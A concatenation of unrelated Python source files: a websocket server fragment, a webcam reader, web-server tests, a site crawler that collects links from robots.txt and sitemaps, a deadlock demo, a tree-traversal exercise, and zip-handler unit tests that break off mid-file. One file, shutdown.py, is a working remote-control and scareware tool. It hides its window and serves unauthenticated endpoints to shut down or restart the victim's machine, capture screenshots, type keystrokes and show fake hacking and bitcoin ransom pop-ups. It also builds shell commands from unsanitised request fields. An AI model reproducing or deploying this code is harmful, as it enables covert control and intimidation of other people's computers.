# Once received turn the reload flag up and send it to execute_thread function
code = message
# print(repr(code))
self.reload = True
self.execute_thread(code)
except:
pass
# Function that gets called when the server is connected
def connected(self, client, server):
self.client = client
self.hal.start_thread()
# Start the GUI update thread
self.thread_gui = ThreadGUI(self.gui)
self.thread_gui.start()
# Initialize the ping message
self.send_frequency_message()
print(client, 'connected')
# Function that gets called when the connected closes
def handle_close(self, client, server):
print(client, 'closed')
def run_server(self):
self.server = WebsocketServer(port=1905, host=self.host)
self.server.set_fn_new_client(self.connected)
self.server.set_fn_client_left(self.handle_close)
self.server.set_fn_message_received(self.handle)
self.server.run_forever()
# Execute!
if __name__ == "__main__":
server = Template()
server.run_server()
|
WebcamVideoStream.py
|
# import the necessary packages
from threading import Thread
import cv2
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
test_serve.py
|
import unittest
import asyncio
import io
import multiprocessing
import urllib.request
import time
import grole
def simple_server():
app = grole.Grole()
@app.route('/')
def hello(env, req):
return 'Hello, World!'
app.run(host='127.0.0.1')
class TestServe(unittest.TestCase):
def test_simple(self):
p = multiprocessing.Process(target=simple_server)
p.start()
time.sleep(0.1)
with urllib.request.urlopen('http://127.0.0.1:1234') as response:
html = response.read()
self.assertEqual(html, b'Hello, World!')
p.terminate()
def test_fileserver(self):
p = multiprocessing.Process(target=grole.main, args=[['-a', '127.0.0.1']])
p.start()
time.sleep(0.1)
with urllib.request.urlopen('http://127.0.0.1:1234/test/test.dat') as response:
html = response.read()
self.assertEqual(html, b'foo\n')
p.terminate()
def test_https(self):
p = multiprocessing.Process(target=simple_server)
p.start()
time.sleep(0.1)
self.assertRaises(urllib.error.URLError)
p.terminate()
|
crawler.py
|
#!/usr/bin/env python3
import os
import re
import bs4
import lxml
import asyncio
import requests
import threading
import tldextract
requests.packages.urllib3.disable_warnings()
R = '\033[31m' # red
G = '\033[32m' # green
C = '\033[36m' # cyan
W = '\033[0m' # white
Y = '\033[33m' # yellow
user_agent = {
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
}
soup = ''
r_url = ''
sm_url = ''
total = []
r_total = []
sm_total = []
js_total = []
css_total = []
int_total = []
ext_total = []
img_total = []
js_crawl_total = []
sm_crawl_total = []
def crawler(target, output, data):
global soup, r_url, sm_url
print('\n' + Y + '[!]' + Y + ' Starting Crawler...' + W + '\n')
try:
rqst = requests.get(target, headers=user_agent, verify=False, timeout=10)
except Exception as e:
print(R + '[-] Exception : ' + C + str(e) + W)
exit()
sc = rqst.status_code
if sc == 200:
page = rqst.content
soup = bs4.BeautifulSoup(page, 'lxml')
ext = tldextract.extract(target)
hostname = '.'.join(part for part in ext if part)
protocol = target.split('://')
protocol = protocol[0]
r_url = protocol + '://' + hostname + '/robots.txt'
sm_url = protocol + '://' + hostname + '/sitemap.xml'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
tasks = asyncio.gather(
robots(target),
sitemap(),
css(target),
js(target),
internal_links(target),
external_links(target),
images(target),
sm_crawl(),
js_crawl())
loop.run_until_complete(tasks)
loop.close()
out(target, output, data)
else:
print (R + '[-]' + C + ' Status : ' + W + str(sc))
def url_filter(target):
global url
if all([url.startswith('/') == True, url.startswith('//') == False]):
url = target + url
else:
pass
if all([url.find('http://') == -1,
url.find('https://') == -1]):
url = url.replace('//', 'http://')
url = url.replace('../', target + '/')
url = url.replace('./', target + '/')
else:
pass
if all([url.find('//') == -1,
url.find('../') == -1,
url.find('./') == -1,
url.find('http://') == -1,
url.find('https://') == -1]):
url = target + '/' + url
else:
pass
async def robots(target):
global url, r_url, r_total
print(G + '[+]' + C + ' Looking for robots.txt' + W, end = '')
try:
r_rqst = requests.get(r_url, headers=user_agent, verify=False, timeout=10)
r_sc = r_rqst.status_code
if r_sc == 200:
print(G + '['.rjust(9, '.') + ' Found ]' + W)
print(G + '[+]' + C + ' Extracting robots Links', end = '')
r_page = r_rqst.text
r_scrape = r_page.split('\n')
for entry in r_scrape:
if (entry.find('Disallow') == 0 or
entry.find('Allow') == 0 or
entry.find('Sitemap') == 0):
url = entry.split(': ')
try:
url = url[1]
url = url.strip()
url_filter(target)
r_total.append(url)
if url.endswith('xml') == True:
sm_total.append(url)
except:
pass
r_total = set(r_total)
print(G + '['.rjust(8, '.') + ' {} ]'.format(str(len(r_total))))
elif r_sc == 404:
print(R + '['.rjust(9, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(9, '.') + ' {} ]'.format(r_sc) + W)
except Exception as e:
print(R + '[-] Exception : ' + C + str(e) + W)
async def sitemap():
global url, sm_url, total, sm_total
print(G + '[+]' + C + ' Looking for sitemap.xml' + W, end = '')
try:
sm_rqst = requests.get(sm_url, headers=user_agent, verify=False, timeout=10)
sm_sc = sm_rqst.status_code
if sm_sc == 200:
print(G + '['.rjust(8, '.') + ' Found ]' + W)
print(G + '[+]' + C + ' Extracting sitemap Links', end = '')
sm_page = sm_rqst.content
sm_soup = bs4.BeautifulSoup(sm_page, 'xml')
links = sm_soup.find_all('loc')
for url in links:
url = url.get_text()
if url != None:
sm_total.append(url)
sm_total = set(sm_total)
print(G + '['.rjust(7, '.') + ' {} ]'.format(str(len(sm_total))))
elif sm_sc == 404:
print(R + '['.rjust(8, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(8, '.') + ' {} ]'.format(sm_sc) + W)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e))
async def css(target):
global url, soup, total, css_total
print(G + '[+]' + C + ' Extracting CSS Links' + W, end = '')
css = soup.find_all('link')
for link in css:
url = link.get('href')
if url != None and '.css' in url:
url_filter(target)
css_total.append(url)
css_total = set(css_total)
print(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(css_total))) + W)
async def js(target):
global url, total, js_total
print(G + '[+]' + C + ' Extracting Javascript Links' + W, end = '')
js = soup.find_all('script')
for link in js:
url = link.get('src')
if url != None and '.js' in url:
url_filter(target)
js_total.append(url)
js_total = set(js_total)
print(G + '['.rjust(4, '.') + ' {} ]'.format(str(len(js_total))))
async def internal_links(target):
global total, int_total
print(G + '[+]' + C + ' Extracting Internal Links' + W, end = '')
ext = tldextract.extract(target)
domain = ext.registered_domain
links = soup.find_all('a')
for link in links:
url = link.get('href')
if url != None:
if domain in url:
int_total.append(url)
int_total = set(int_total)
print(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(int_total))))
async def external_links(target):
global total, ext_total
print(G + '[+]' + C + ' Extracting External Links' + W, end = '')
ext = tldextract.extract(target)
domain = ext.registered_domain
links = soup.find_all('a')
for link in links:
url = link.get('href')
if url != None:
if domain not in url and 'http' in url:
ext_total.append(url)
ext_total = set(ext_total)
print(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(ext_total))))
async def images(target):
global url, total, img_total
print(G + '[+]' + C + ' Extracting Images' + W, end = '')
images = soup.find_all('img')
for link in images:
url = link.get('src')
if url != None and len(url) > 1:
url_filter(target)
img_total.append(url)
img_total = set(img_total)
print(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(img_total))))
async def sm_crawl():
global sm_crawl_total
print(G + '[+]' + C + ' Crawling Sitemaps' + W, end = '')
threads = []
def fetch(site_url):
try:
sm_rqst = requests.get(site_url, headers=user_agent, verify=False, timeout=10)
sm_sc = sm_rqst.status_code
if sm_sc == 200:
sm_data = sm_rqst.content.decode()
sm_soup = bs4.BeautifulSoup(sm_data, 'xml')
links = sm_soup.find_all('loc')
for url in links:
url = url.get_text()
if url != None:
sm_crawl_total.append(url)
elif sm_sc == 404:
print(R + '['.rjust(8, '.') + ' Not Found ]' + W)
else:
print(R + '['.rjust(8, '.') + ' {} ]'.format(sm_sc) + W)
except Exception as e:
print('\n' + R + '[-] Exception : ' + C + str(e))
for site_url in sm_total:
if site_url != sm_url:
if site_url.endswith('xml') == True:
t = threading.Thread(target=fetch, args=[site_url])
t.daemon = True
threads.append(t)
t.start()
for thread in threads:
thread.join()
sm_crawl_total = set(sm_crawl_total)
print(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(sm_crawl_total))))
async def js_crawl():
global js_crawl_total
print(G + '[+]' + C + ' Crawling Javascripts' + W, end = '')
threads = []
def fetch(js_url):
try:
js_rqst = requests.get(js_url, headers=user_agent, verify=False, timeout=10)
js_sc = js_rqst.status_code
if js_sc == 200:
js_data = js_rqst.content.decode()
js_data = js_data.split(';')
for line in js_data:
if any(['http://' in line, 'https://' in line]):
found = re.findall(r'\"(http[s]?://.*?)\"', line)
for item in found:
if len(item) > 8:
js_crawl_total.append(item)
except Exception as e:
print(R + '[-] Exception : ' + C + str(e))
for js_url in js_total:
t = threading.Thread(target=fetch, args=[js_url])
t.daemon = True
threads.append(t)
t.start()
for thread in threads:
thread.join()
js_crawl_total = set(js_crawl_total)
print(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(js_crawl_total))))
def out(target, output, data):
global total
total.extend(r_total)
total.extend(sm_total)
total.extend(css_total)
total.extend(js_total)
total.extend(js_crawl_total)
total.extend(sm_crawl_total)
total.extend(int_total)
total.extend(ext_total)
total.extend(img_total)
total = set(total)
print('\n' + G + '[+]' + C + ' Total Unique Links Extracted : ' + W + str(len(total)))
if output != 'None':
if len(total) != 0:
data['module-Crawler'] = {'Total Unique Links Extracted': str(len(total))}
try:
data['module-Crawler'].update({'Title':soup.title.string})
except AttributeError:
data['module-Crawler'].update({'Title : None'})
data['module-Crawler'].update(
{
'Count ( Robots )': str(len(r_total)),
'Count ( Sitemap )': str(len(sm_total)),
'Count ( CSS )': str(len(css_total)),
'Count ( JS )': str(len(js_total)),
'Count ( Links in JS )': str(len(js_crawl_total)),
'Count ( Links in Sitemaps )': str(len(sm_crawl_total)),
'Count ( Internal )': str(len(int_total)),
'Count ( External )': str(len(ext_total)),
'Count ( Images )': str(len(img_total)),
'Count ( Total )': str(len(total))
})
if len(r_total) != 0:
data['module-Crawler'].update({'Robots': list(r_total)})
if len(sm_total) != 0:
data['module-Crawler'].update({'Sitemaps': list(sm_total)})
if len(css_total) != 0:
data['module-Crawler'].update({'CSS': list(css_total)})
if len(js_total) != 0:
data['module-Crawler'].update({'Javascripts': list(js_total)})
if len(js_crawl_total) != 0:
data['module-Crawler'].update({'Links inside Javascripts': list(js_crawl_total)})
if len(sm_crawl_total) != 0:
data['module-Crawler'].update({'Links Inside Sitemaps': list(sm_crawl_total)})
if len(int_total) != 0:
data['module-Crawler'].update({'Internal Links': list(int_total)})
if len(ext_total) != 0:
data['module-Crawler'].update({'External Links': list(ext_total)})
if len(img_total) != 0:
data['module-Crawler'].update({'Images': list(img_total)})
|
deadlock.py
|
import threading
import socket
import select
import sys
l = threading.Lock()
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("localhost", 0))
listener.listen(1)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect(listener.getsockname())
s3 = listener.accept()[0]
def server():
try:
while True:
if not s3.recv(100):
s3.close()
break
s3.send("aaa")
except KeyboardInterrupt:
s3.close()
def client(name):
try:
while True:
sys.stdout.write("%s acq\n" % (name,))
try:
l.acquire()
sys.stdout.write("%s ACQ\n" % (name,))
r, _, _, = select.select([s2], [], [], 0.1)
if not r:
continue
buf = s2.recv(100)
if not buf:
s2.close()
break
s2.send("bbb")
finally:
sys.stdout.write("%s rel\n" % (name,))
l.release()
sys.stdout.write("%s REL\n" % (name,))
except KeyboardInterrupt:
s2.close()
t1 = threading.Thread(target=server)
t2 = threading.Thread(target=client, args=("C1",))
t1.start()
t2.start()
client("C2")
|
shutdown.py
|
import os
from flask import Flask, request, jsonify
import threading
import logging
from time import sleep
import pyautogui
from gtts import gTTS
import tempfile
#logging.getLogger("Flask").setLevel(logging.WARNING)
from playsound import playsound
import socket
import numpy as np
import cv2
pyautogui.FAILSAFE = False
#config
hide_self = True
#end of config
counter=1
use_alt_tab=True
def clear_screen():
global counter
sleep(1)
os.system('cls')
os.system("color A")
print("Startup Script Running.....")
print("Host is Windows")
print("performing tasks do not close\n"*counter)
counter = counter+1
def thread_clear_screen():
t = threading.Thread(target=clear_screen,args=())
t.start()
def thread_run_vb_in_background():
os.system("call %temp%\\TEMPmessage.vbs")
os.system("del %temp%\\TEMPmessage.vbs /f /q")
def show_error(title,message):
content = "echo x=MsgBox(\""+message+"\",2+16,\""+title+"\") > %temp%\\TEMPmessage.vbs"
os.system(content)
t = threading.Thread(target=thread_run_vb_in_background,args=())
t.start()
if use_alt_tab:
pyautogui.hotkey('alt','tab')
def show_error_spam():
global use_alt_tab
show_error("Dead", "Hacked By Velocoraptor")
sleep(0.5)
use_alt_tab = False
show_error("System Error", "System is curropted")
sleep(0.5)
show_error("Encrypting files", "50%")
sleep(0.5)
show_error("Virus Mirus", "143 accounts hijacked")
sleep(0.5)
show_error("Euro Miner", "Removed 34.09 euro from bank accounts")
sleep(0.5)
show_error("Restore Your Pc", "Pay 0.534btc to UDEIFUEU343FSRSFE343453399DFSKI")
use_alt_tab = True
def showtext(text,use_enter):
if len(text) > 0:
for letter in text:
pyautogui.press(letter)
if use_enter == "true":
pyautogui.press('enter')
def text_to_speach(text,language,use_slow):
tts = gTTS(text=text, lang=language, slow=use_slow)
tts.save(tempfile.gettempdir()+"\\speech.mp3")
playsound(tempfile.gettempdir()+"\\speech.mp3")
os.system("del "+tempfile.gettempdir()+"\\speech.mp3 /f /q")
app = Flask(__name__)
#app.logger.disabled = True
#log = logging.getLogger('Flask')
#log.disabled = True
@app.route('/', methods=['GET'])
def index():
thread_clear_screen()
response = jsonify({'server': 'up'})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/shutdown', methods=['GET'])
def shutdown():
os.system('shutdown -s -t 0')
thread_clear_screen()
response = jsonify({'shutdown': 'ok'})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/restart', methods=['GET'])
def restart():
os.system('shutdown -r -t 0')
thread_clear_screen()
response = jsonify({'restart': 'ok'})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/alt_f4', methods=['GET'])
def alt_f4():
pyautogui.hotkey('alt','F4')
thread_clear_screen()
response = jsonify({'altf4': 'ok'})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/move_mouse', methods=['GET'])
def move_mouse():
pyautogui.moveTo(0,0,0.5)
thread_clear_screen()
response = jsonify({'mouse': 'moved'})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/mouse_spaz', methods=['GET'])
def mouse_spaz():
pyautogui.move(0,1000,0.2)#down
pyautogui.move(-1000,0,0.2)#left
pyautogui.move(0,-1000,0.2)#up
pyautogui.move(1000,0,0.2)#right
thread_clear_screen()
response = jsonify({'mouse': 'spazed'})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/showerror', methods=['POST'])
def showerror():
title = request.form['title']
message = request.form['message']
t = threading.Thread(target=show_error,args=(title,message))
t.start()
thread_clear_screen()
response = jsonify({'error_message': 'showed'})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/text', methods=['POST'])
def text():
text = request.form['text']
use_enter = request.form['use_enter']
t = threading.Thread(target=showtext,args=(text,use_enter))
t.start()
thread_clear_screen()
response = jsonify({'text': 'typed'})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/showerror_spam', methods=['GET'])
def showerror_spam():
t = threading.Thread(target=show_error_spam,args=())
t.start()
thread_clear_screen()
response = jsonify({'error_message': 'spammed'})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/speak', methods=['POST'])
def speak():
text = request.form['text']
language = request.form['language']
use_slow = request.form['slow']
if use_slow == 'true':
use_slow = True
else:
use_slow = False
t = threading.Thread(target=text_to_speach,args=(text,language,use_slow))
t.start()
thread_clear_screen()
response = jsonify({'text': 'typed'})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/screenshot', methods=['GET'])
def screenshot():
image = pyautogui.screenshot()
image = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
cv2.imwrite(tempfile.gettempdir()+"\\screenshot.png", image)
img = open(tempfile.gettempdir()+"\\screenshot.png", 'rb').read()
response = jsonify()
response.mimetype='image/png'
response.data = img
response.headers.add('Access-Control-Allow-Origin', '*')
return response
def main():
t = threading.Thread(target=clear_screen,args=())
t.start()
if hide_self:
os.system("powershell -window Hidden -command \"\"")
app.run(host=get_ip(), port=80,debug=False)
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ipaddres = s.getsockname()[0]
s.close()
return ipaddres
if __name__ == '__main__':
main()
|
tree-orders.py
|
# python3
import sys, threading
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeOrders:
def read(self):
self.n = int(sys.stdin.readline())
self.key = [0 for i in range(self.n)]
self.left = [0 for i in range(self.n)]
self.right = [0 for i in range(self.n)]
for i in range(self.n):
[a, b, c] = map(int, sys.stdin.readline().split())
self.key[i] = a
self.left[i] = b
self.right[i] = c
def inOrder(self):
self.result = []
# Finish the implementation
# You may need to add a new recursive method to do that
self.inO(0)
return self.result
def inO(self, root):
if root == -1:
return
self.inO(self.left[root])
self.result.append(self.key[root])
self.inO(self.right[root])
def preOrder(self):
self.result = []
# Finish the implementation
# You may need to add a new recursive method to do that
self.preO(0)
return self.result
def preO(self, root):
if root == -1:
return
self.result.append(self.key[root])
self.preO(self.left[root])
self.preO(self.right[root])
def postOrder(self):
self.result = []
# Finish the implementation
# You may need to add a new recursive method to do that
self.posO(0)
return self.result
def posO(self, root):
if root == -1:
return
self.posO(self.left[root])
self.posO(self.right[root])
self.result.append(self.key[root])
def main():
tree = TreeOrders()
tree.read()
print(" ".join(str(x) for x in tree.inOrder()))
print(" ".join(str(x) for x in tree.preOrder()))
print(" ".join(str(x) for x in tree.postOrder()))
threading.Thread(target=main).start()
|
test_zip_container.py
|
import io
import multiprocessing
import os
import pickle
import random
import shutil
import string
import subprocess
import sys
import tempfile
import unittest
from datetime import datetime
from zipfile import ZipFile
import pytest
from parameterized import parameterized
import pfio
def make_zip(zipfilename, root_dir, base_dir):
pwd = os.getcwd()
with ZipFile(zipfilename, "w") as f:
os.chdir(root_dir)
for root, dirs, filenames in os.walk(base_dir):
for _dir in dirs:
path = os.path.normpath(os.path.join(root, _dir))
f.write(path)
for _file in filenames:
path = os.path.normpath(os.path.join(root, _file))
f.write(path)
os.chdir(pwd)
def make_random_str(n):
return ''.join([random.choice(string.ascii_letters + string.digits)
for i in range(n)])
ZIP_TEST_FILENAME_LIST = {
"dir_name1": "testdir1",
"dir_name2": "testdir2",
"zipped_file_name": "testfile1",
"testfile_name": "testfile2",
"nested_dir_name": "nested_dir",
"nested_zip_file_name": "nested.zip",
}
NON_EXIST_LIST = ["does_not_exist", "does_not_exist/", "does/not/exist"]
class TestZipHandler(unittest.TestCase):
def setUp(self):
# The following zip layout is created for all the tests
# outside.zip
# | - testdir1
# | | - nested1.zip
# | | - nested_dir
# | | - nested
# | - testdir2
# | | - testfile1
# | - testfile2
self.test_string = "this is a test string\n"
self.nested_test_string = \
"this is a test string for nested zip\n"
self.test_string_b = self.test_string.encode("utf-8")
self.nested_test_string_b = \
self.nested_test_string.encode("utf-8")
self.fs_handler = pfio.create_handler("posix")
# the most outside zip
self.zip_file_name = "outside"
# nested zip and nested file
self.tmpdir = tempfile.TemporaryDirectory()
self.nested_zipped_file_name = "nested"
self.nested_dir_name = ZIP_TEST_FILENAME_LIST["nested_dir_name"]
self.nested_dir_path = os.path.join(self.tmpdir.name,
self.nested_dir_name)
self.nested_zip_file_name = \
ZIP_TEST_FILENAME_LIST["nested_zip_file_name"]
# directory and file
self.dir_name1 = ZIP_TEST_FILENAME_LIST["dir_name1"]
self.dir_name2 = ZIP_TEST_FILENAME_LIST["dir_name2"]
self.zipped_file_name = ZIP_TEST_FILENAME_LIST["zipped_file_name"]
self.testfile_name = ZIP_TEST_FILENAME_LIST["testfile_name"]
# paths used in making outside.zip
dir_path1 = os.path.join(self.tmpdir.name, self.dir_name1)
dir_path2 = os.path.join(self.tmpdir.name, self.dir_name2)
testfile_path = os.path.join(self.tmpdir.name, self.testfile_name)
nested_dir_path = os.path.join(self.tmpdir.name, self.nested_dir_name)
zipped_file_path = os.path.join(dir_path2, self.zipped_file_name)
nested_zipped_file_path = os.path.join(
nested_dir_path, self.nested_zipped_file_name)
nested_zip_file_path = os.path.join(
dir_path1, self.nested_zip_file_name)
# paths used in tests
self.zip_file_path = self.zip_file_name + ".zip"
self.zipped_file_path = os.path.join(self.dir_name2,
self.zipped_file_name)
self.nested_zip_path = os.path.join(
self.dir_name1, self.nested_zip_file_name)
self.nested_zipped_file_path = os.path.join(
self.nested_dir_name, self.nested_zipped_file_name)
os.mkdir(dir_path1)
os.mkdir(dir_path2)
os.mkdir(nested_dir_path)
with open(zipped_file_path, "w") as tmpfile:
tmpfile.write(self.test_string)
with open(nested_zipped_file_path, "w") as tmpfile:
tmpfile.write(self.nested_test_string)
with open(testfile_path, "w") as tmpfile:
tmpfile.write(self.test_string)
make_zip(nested_zip_file_path,
root_dir=self.tmpdir.name,
base_dir=self.nested_dir_name)
shutil.rmtree(nested_dir_path)
# this will include outside.zip itself into the zip
make_zip(self.zip_file_path,
root_dir=self.tmpdir.name,
base_dir=".")
def tearDown(self):
self.tmpdir.cleanup()
pfio.remove(self.zip_file_path)
def test_read_bytes(self):
with self.fs_handler.open_as_container(
os.path.abspath(self.zip_file_path)) as handler:
with handler.open(self.zipped_file_path, "rb") as zipped_file:
self.assertEqual(self.test_string_b, zipped_file.read())
def test_read_string(self):
with self.fs_handler.open_as_container(
os.path.abspath(self.zip_file_path)) as handler:
with handler.open(self.zipped_file_path, "r") as zipped_file:
self.assertEqual(self.test_string, zipped_file.readline())
@pytest.mark.skipif(sys.version_info < (3, 6),
reason="requires python3.6 or higher")
def test_write_bytes(self):
testfile_name = "testfile3"
test_string = "this is a written string\n"
test_string_b = test_string.encode("utf-8")
with self.fs_handler.open_as_container(
os.path.abspath(self.zip_file_path)) as handler:
with handler.open(testfile_name, "wb") as zipped_file:
zipped_file.write(test_string_b)
with self.fs_handler.open_as_container(
os.path.abspath(self.zip_file_path)) as handler:
with handler.open(testfile_name, "rb") as zipped_file:
self.assertEqual(test_string_b, zipped_file.readline())
@pytest.mark.skipif(sys.version_info < (3, 6),
reason="requires python3.6 or higher")
def test_write_string(self):
testfile_name = "testfile3"
test_string = "this is a written string\n"
with self.fs_handler.open_as_container(
os.path.abspath(self.zip_file_path)) as handler:
with handler.open(testfile_name, "w") as zipped_file:
zipped_file.write(test_string)
with self.fs_handler.open_as_container(
os.path.abspath(self.zip_file_path)) as handler:
with handler.open(testfile_name, "r") as zipped_file:
self.assertEqual(test_string, zipped_file.readline())
def test_open_non_exist(self):
non_exist_file = "non_exist_file.txt"
with self.fs_handler.open_as_container(non_exist_file) as handler:
self.assertRaises(IOError, handler.open, non_exist_file)
@parameterized.expand([
# not normalized path
['././{}//../{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"])]
])
def test_open_non_normalized_path(self, path_or_prefix):
with self.fs_handler.open_as_container(
os.path.abspath(self.zip_file_path)) as handler:
with handler.open(path_or_prefix, "r") as zipped_file:
self.assertEqual(self.test_string, zipped_file.read())
@parameterized.expand([
# default case get the first level from the root
["",
[ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["testfile_name"]],
False],
# Problem 1 in issue #66
[ZIP_TEST_FILENAME_LIST["dir_name2"],
[ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
False],
# problem 2 in issue #66
[ZIP_TEST_FILENAME_LIST["dir_name2"],
[ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
False],
# not normalized path
['{}//{}//../'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
[ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
False],
# not normalized path root
['{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
[ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["testfile_name"]],
False],
# not normalized path beyond root
['//..//',
[ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["testfile_name"]],
False],
# not normalized path beyond root
['{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
[ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["testfile_name"]],
False],
# starting with slash
['/',
[ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["testfile_name"]],
False],
# recursive test
['',
[ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
os.path.join(ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["nested_zip_file_name"]),
os.path.join(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
ZIP_TEST_FILENAME_LIST["testfile_name"]],
True],
[ZIP_TEST_FILENAME_LIST["dir_name2"],
[ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
True],
# problem 2 in issue #66
[ZIP_TEST_FILENAME_LIST["dir_name2"],
[ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
True],
# not normalized path
['{}//{}//../'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
[ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
True],
# not normalized path root
['{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
[ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
os.path.join(ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["nested_zip_file_name"]),
os.path.join(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
ZIP_TEST_FILENAME_LIST["testfile_name"]],
True],
# not normalized path beyond root
['//..//',
[ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
os.path.join(ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["nested_zip_file_name"]),
os.path.join(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
ZIP_TEST_FILENAME_LIST["testfile_name"]],
True],
# starting with slash
['/',
[ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
os.path.join(ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["nested_zip_file_name"]),
os.path.join(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
ZIP_TEST_FILENAME_LIST["testfile_name"]],
True]]
)
def test_list(self, path_or_prefix, expected_list, recursive):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
zip_generator = handler.list(path_or_prefix,
recursive=recursive)
zip_list = list(zip_generator)
self.assertEqual(sorted(expected_list),
sorted(zip_list))
@parameterized.expand([
# non_exist_file
['does_not_exist', FileNotFoundError],
# not exist but share the prefix
['{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"][:1]),
FileNotFoundError],
# broken path
['{}//{}/'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"][:1]),
FileNotFoundError],
# list a file
['{}//{}///'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
NotADirectoryError]
])
def test_list_with_errors(self, path_or_prefix, error):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
with self.assertRaises(error):
list(handler.list(path_or_prefix))
with self.assertRaises(error):
list(handler.list(path_or_prefix, recursive=True))
def test_info(self):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertIsInstance(handler.info(), str)
@parameterized.expand([
# path ends with slash
['{}//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
True],
# not normalized path
['{}//{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
False],
['{}//..//{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
False],
# problem 2 in issue #66
[ZIP_TEST_FILENAME_LIST["dir_name2"],
True],
# not normalized path
